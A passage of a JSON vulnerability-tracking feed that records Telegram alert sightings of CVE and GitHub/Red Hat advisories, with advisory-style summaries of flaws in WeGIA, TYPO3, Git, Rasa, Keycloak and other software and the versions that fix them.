https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "f24b59b2-3e26-4f5a-8074-fa244289f5c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7922", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "5fd000ff-383b-49a8-af39-2a95f1af1cd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFJJ-7RGC-6J2M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1394", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22619\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `editar_permissoes.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `msg_c` parameter. The application fails to validate and sanitize user inputs in the `msg_c` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in release version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:47:26.312Z\n\ud83d\udccf Modified: 2025-01-13T20:47:26.312Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jfjj-7rgc-6j2m\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/f1233c30f00398f7a02fd9dd9cd46fb35098f2a4", "creation_timestamp": "2025-01-13T21:12:04.000000Z"}, {"uuid": "b1f6fa2c-24fc-400d-90d7-23fa9c80d8e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPV4-GGRR-7J9V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1569", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49375\n\ud83d\udd39 Description: Open source machine learning framework. A vulnerability has been identified in Rasa that enables an attacker who has the ability to load a maliciously crafted model remotely into a Rasa instance to achieve Remote Code Execution. The prerequisites for this are: 1. The HTTP API must be enabled on the Rasa instance eg with `--enable-api`. This is not the default configuration. 2. For unauthenticated RCE to be exploitable, the user must not have configured any authentication or other security controls recommended in our documentation. 3. For authenticated RCE, the attacker must posses a valid authentication token or JWT to interact with the Rasa API. This issue has been addressed in rasa version 3.6.21 and all users are advised to upgrade. Users unable to upgrade should ensure that they require authentication and that only trusted users are given access.\n\ud83d\udccf Published: 2025-01-14T18:59:53.181Z\n\ud83d\udccf Modified: 2025-01-14T18:59:53.181Z\n\ud83d\udd17 References:\n1. https://github.com/RasaHQ/rasa-pro-security-advisories/security/advisories/GHSA-cpv4-ggrr-7j9v", "creation_timestamp": "2025-01-14T19:09:45.000000Z"}, {"uuid": "1f81e3da-e720-47b0-80d4-5841c9712050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0299", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1465", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11734\n\ud83d\udd39 Description: A denial of service vulnerability was found in Keycloak that could allow an administrative user with the right to change realm settings to disrupt the service. This action is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that has already been terminated, leading to the failure of said request.\n\ud83d\udccf Published: 2025-01-14T08:35:42.107Z\n\ud83d\udccf Modified: 2025-01-14T08:35:42.107Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11734\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328846", "creation_timestamp": "2025-01-14T09:10:36.000000Z"}, {"uuid": "df21819d-a36d-4f86-9d45-5566fd4eab5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1465", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11734\n\ud83d\udd39 Description: A denial of service vulnerability was found in Keycloak that could allow an administrative user with the right to change realm settings to disrupt the service. This action is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that has already been terminated, leading to the failure of said request.\n\ud83d\udccf Published: 2025-01-14T08:35:42.107Z\n\ud83d\udccf Modified: 2025-01-14T08:35:42.107Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11734\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328846", "creation_timestamp": "2025-01-14T09:10:36.000000Z"}, {"uuid": "7f155896-619e-427c-af68-1f28a24ad0cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V68M-2RVF-8R25", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1512", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23034\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `tags.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `msg_e` parameter. The application fails to validate and sanitize user inputs in the `msg_e` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T23:31:12.172Z\n\ud83d\udccf Modified: 2025-01-14T15:56:22.611Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v68m-2rvf-8r25\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/8a37021417d9c55e61392b3cc52baa3c73102bab", "creation_timestamp": "2025-01-14T16:18:32.000000Z"}, {"uuid": "c35ad0ac-b012-4add-942e-d38281da26e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6W4X-GCX3-8P7V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1590", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55894\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component \u201cBackend User Module\u201d allows attackers to initiate password resets for other backend users or to terminate their user sessions. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described.\n\ud83d\udccf Published: 2025-01-14T19:57:28.172Z\n\ud83d\udccf Modified: 2025-01-14T19:57:28.172Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-6w4x-gcx3-8p7v", "creation_timestamp": "2025-01-14T20:08:48.000000Z"}, {"uuid": "213d7d91-feb6-40dd-916e-fee70e9c03a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HMG8-H7QF-7CXR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1589", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-50349\n\ud83d\udd39 Description: Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When Git asks for credentials via a terminal prompt (i.e. without using any credential helper), it prints out the host name for which the user is expected to provide a username and/or a password. At this stage, any URL-encoded parts have been decoded already, and are printed verbatim. This allows attackers to craft URLs that contain ANSI escape sequences that the terminal interpret to confuse users e.g. into providing passwords for trusted Git hosting sites when in fact they are then sent to untrusted sites that are under the attacker's control. This issue has been patch via commits `7725b81` and `c903985` which are included in release versions v2.48.1, v2.47.1, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, and v2.40.4. Users are advised to upgrade. Users unable to upgrade should avoid cloning from untrusted URLs, especially recursive clones.\n\ud83d\udccf Published: 2025-01-14T18:43:42.620Z\n\ud83d\udccf Modified: 2025-01-14T18:43:42.620Z\n\ud83d\udd17 References:\n1. https://github.com/git/git/security/advisories/GHSA-hmg8-h7qf-7cxr\n2. https://github.com/git/git/commit/7725b8100ffbbff2750ee4d61a0fcc1f53a086e8\n3. https://github.com/git/git/commit/c903985bf7e772e2d08275c1a95c8a55ab011577", "creation_timestamp": "2025-01-14T19:11:33.000000Z"}, {"uuid": "505e28df-d1fe-4923-973a-a4ac0f0f4e4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QFMH-QRR2-5C4G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1511", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23035\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_tipo_quadro_horario.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `tipo` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_tipo_quadro_horario.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T23:30:38.680Z\n\ud83d\udccf Modified: 2025-01-14T15:56:51.621Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qfmh-qrr2-5c4g\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/673d7a36baebb1a0093f421cfd51e3df8a55c84a", "creation_timestamp": "2025-01-14T16:18:26.000000Z"}, {"uuid": "13c64394-8a21-4fda-bc99-8e4e1096e6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RMM7-R7WR-XPFG", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1549", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23025\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. NOTE: The Realtime WYSIWYG Editor extension was **experimental**, and thus **not recommended**, in the versions affected by this vulnerability. It has become enabled by default, and thus recommended, starting with XWiki 16.9.0. A user with only **edit right** can join a realtime editing session where others, that where already there or that may join later, have **script** or **programming** access rights. This user can then insert **script rendering macros** that are executed for those users in the realtime session that have script or programming rights. The inserted scripts can be used to gain more access rights. This vulnerability has been patched in XWiki 15.10.2, 16.4.1 and 16.6.0-rc-1. Users are advised to upgrade. Users unable to upgrade may either disable the realtime WYSIWYG editing by disabling the ``xwiki-realtime`` CKEditor plugin from the WYSIWYG editor administration section or uninstall the Realtime WYSIWYG Editorextension (org.xwiki.platform:xwiki-platform-realtime-wysiwyg-ui).\n\ud83d\udccf Published: 2025-01-14T17:42:14.304Z\n\ud83d\udccf Modified: 2025-01-14T17:42:14.304Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rmm7-r7wr-xpfg\n2. https://extensions.xwiki.org/xwiki/bin/view/Extension/CKEditor+Integration#HAdministrationSection\n3. https://extensions.xwiki.org/xwiki/bin/view/Extension/Realtime%20WYSIWYG%20Editor\n4. https://jira.xwiki.org/browse/XWIKI-21949", "creation_timestamp": "2025-01-14T18:09:22.000000Z"}, {"uuid": "36b3c1b9-7219-4564-891b-d2bb0832d068", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0115", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1704", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-50312\n\ud83d\udd39 Description: A vulnerability was found in GraphQL due to improper access controls on the GraphQL introspection query. This flaw allows unauthorized users to retrieve a comprehensive list of available queries and mutations. Exposure to this flaw increases the attack surface, as it can facilitate the discovery of flaws or errors specific to the application's GraphQL implementation.\n\ud83d\udccf Published: 2024-10-22T13:24:12.165Z\n\ud83d\udccf Modified: 2025-01-15T05:35:38.787Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0115\n2. https://access.redhat.com/errata/RHSA-2025:0140\n3. https://access.redhat.com/security/cve/CVE-2024-50312\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2319378\n5. https://github.com/openshift/console/pull/14409/files", "creation_timestamp": "2025-01-15T06:10:23.000000Z"}, {"uuid": "59a36ef2-851a-430e-946d-eb07aee74c2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0140", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1704", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-50312\n\ud83d\udd39 Description: A vulnerability was found in GraphQL due to improper access controls on the GraphQL introspection query. This flaw allows unauthorized users to retrieve a comprehensive list of available queries and mutations. Exposure to this flaw increases the attack surface, as it can facilitate the discovery of flaws or errors specific to the application's GraphQL implementation.\n\ud83d\udccf Published: 2024-10-22T13:24:12.165Z\n\ud83d\udccf Modified: 2025-01-15T05:35:38.787Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0115\n2. https://access.redhat.com/errata/RHSA-2025:0140\n3. https://access.redhat.com/security/cve/CVE-2024-50312\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2319378\n5. https://github.com/openshift/console/pull/14409/files", "creation_timestamp": "2025-01-15T06:10:23.000000Z"}, {"uuid": "8d07ed46-bc7e-426a-90dc-36d97fae9cb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJFR-9F5R-3Q93", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1779", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55893\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component \u201cLog Module\u201d allows attackers to remove log entries. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T20:00:15.247Z\n\ud83d\udccf Modified: 2025-01-15T15:44:53.027Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-cjfr-9f5r-3q93\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-003", "creation_timestamp": "2025-01-15T15:55:08.000000Z"}, {"uuid": "9b8ebb2b-b7d8-4a38-8d58-1235be6f3da3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R5Q-4QGX-V545", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1761", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55923\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component \u201cIndexed Search Module\u201d allows attackers to delete items of the component. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2025-01-14T19:20:11.061Z\n\ud83d\udccf Modified: 2025-01-15T15:01:28.523Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-7r5q-4qgx-v545\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-008", "creation_timestamp": "2025-01-15T15:10:27.000000Z"}, {"uuid": "945d98a7-47e4-4464-89f9-96467c7d6896", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7835-FCV3-G256", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1760", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55924\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component \u201cScheduler Module\u201d allows attackers to trigger pre-defined command classes - which can lead to unauthorized import or export of data in the worst case. Users are advised to update to TYPO3 versions 11.5.42 ELTS which fixes the problem described. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T19:16:46.693Z\n\ud83d\udccf Modified: 2025-01-15T15:02:04.879Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-7835-fcv3-g256\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-009", "creation_timestamp": "2025-01-15T15:10:22.000000Z"}, {"uuid": "4203d467-afbc-44e8-8638-78088d45f118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFCH-8RHV-V286", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/711", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33970\n\ud83d\udd39 Description: Kanboard is open source project management software that focuses on the Kanban methodology. A vulnerability related to a `missing access control` was found, which allows a User with the lowest privileges to leak all the tasks and projects titles within the software, even if they are not invited or it's a personal project. This could also lead to private/critical information being leaked if such information is in the title. This issue has been addressed in version 1.2.30. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\n\ud83d\udccf Published: 2023-06-05T19:54:38.686Z\n\ud83d\udccf Modified: 2025-01-08T16:01:46.073Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-wfch-8rhv-v286\n2. https://github.com/kanboard/kanboard/commit/b501ef44bc28ee9cf603a4fa446ee121d66f652f", "creation_timestamp": "2025-01-08T16:14:49.000000Z"}, {"uuid": "1efed6c6-10c0-4ca6-8dc9-be752c1271a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5RX-RMQ3-FF3H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/720", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55656\n\ud83d\udd39 Description: RedisBloom adds a set of probabilistic data structures to Redis. There is an integer overflow vulnerability in RedisBloom, which is a module used in Redis. The integer overflow vulnerability allows an attacker (a redis client which knows the password) to allocate memory in the heap lesser than the required memory due to wraparound. Then read and write can be performed beyond this allocated memory, leading to info leak and OOB write. The integer overflow is in CMS.INITBYDIM command, which initialize a Count-Min Sketch to dimensions specified by user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch(). This vulnerability is fixed in 2.2.19, 2.4.12, 2.6.14, and 2.8.2.\n\ud83d\udccf Published: 2025-01-08T15:38:54.859Z\n\ud83d\udccf Modified: 2025-01-08T15:52:23.554Z\n\ud83d\udd17 References:\n1. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h", "creation_timestamp": "2025-01-08T16:18:22.000000Z"}, {"uuid": "69f4821a-a604-4253-8dbc-3f7ba36b8cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86H2-2G4G-29QX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/725", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34102\n\ud83d\udd39 Description: Avo is an open source ruby on rails admin panel creation framework. The polymorphic field type stores the classes to operate on when updating a record with user input, and does not validate them in the back end. This can lead to unexpected behavior, remote code execution, or application crashes when viewing a manipulated record. This issue has been addressed in commit `ec117882d` which is expected to be included in subsequent releases. Users are advised to limit access to untrusted users until a new release is made.\n\ud83d\udccf Published: 2023-06-05T22:16:43.861Z\n\ud83d\udccf Modified: 2025-01-08T15:48:32.200Z\n\ud83d\udd17 References:\n1. https://github.com/avo-hq/avo/security/advisories/GHSA-86h2-2g4g-29qx\n2. https://github.com/avo-hq/avo/commit/ec117882ddb1b519481bdd046dc3cfa4474e6e17", "creation_timestamp": "2025-01-08T16:20:00.000000Z"}, {"uuid": "121f2872-3c7e-429d-a7c3-6235c0c12c12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWHF-PX96-7F6V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2213", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21606\n\ud83d\udd39 Description: stats is a macOS system monitor in for the menu bar. The Stats application is vulnerable to a local privilege escalation due to the insecure implementation of its XPC service. The application registers a Mach service under the name `eu.exelban.Stats.SMC.Helper`. The associated binary, eu.exelban.Stats.SMC.Helper, is a privileged helper tool designed to execute actions requiring elevated privileges on behalf of the client, such as setting fan modes, adjusting fan speeds, and executing the `powermetrics` command. The root cause of this vulnerability lies in the `shouldAcceptNewConnection` method, which unconditionally returns YES (or true), allowing any XPC client to connect to the service without any form of verification. As a result, unauthorized clients can establish a connection to the Mach service and invoke methods exposed by the HelperTool interface. An attacker can exploit this vulnerability to modify the hardware settings of the user\u2019s device and execute arbitrary code with root privileges. This issue has been addressed in version 2.11.21 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-17T20:10:05.277Z\n\ud83d\udccf Modified: 2025-01-17T20:10:05.277Z\n\ud83d\udd17 References:\n1. https://github.com/exelban/stats/security/advisories/GHSA-qwhf-px96-7f6v\n2. https://github.com/exelban/stats/commit/c10759f7a186efdd82ddd818dae2ac1f853691fc", "creation_timestamp": "2025-01-17T20:58:02.000000Z"}, {"uuid": "3ffddc34-c35a-4afe-ab9b-dbbfca028b56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2F4W-6MC7-4W78", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2069", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56144\n\ud83d\udd39 Description: librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameters (Replace $DEVICE_ID with your specific $DEVICE_ID value):`/device/$DEVICE_ID/edit` -&gt; param: display. Librenms versions up to 24.11.0 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.12.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-16T22:28:03.567Z\n\ud83d\udccf Modified: 2025-01-16T22:28:03.567Z\n\ud83d\udd17 References:\n1. https://github.com/librenms/librenms/security/advisories/GHSA-2f4w-6mc7-4w78", "creation_timestamp": "2025-01-16T22:56:24.000000Z"}, {"uuid": "3f047f5b-191c-4548-bcd9-47c822e44f17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 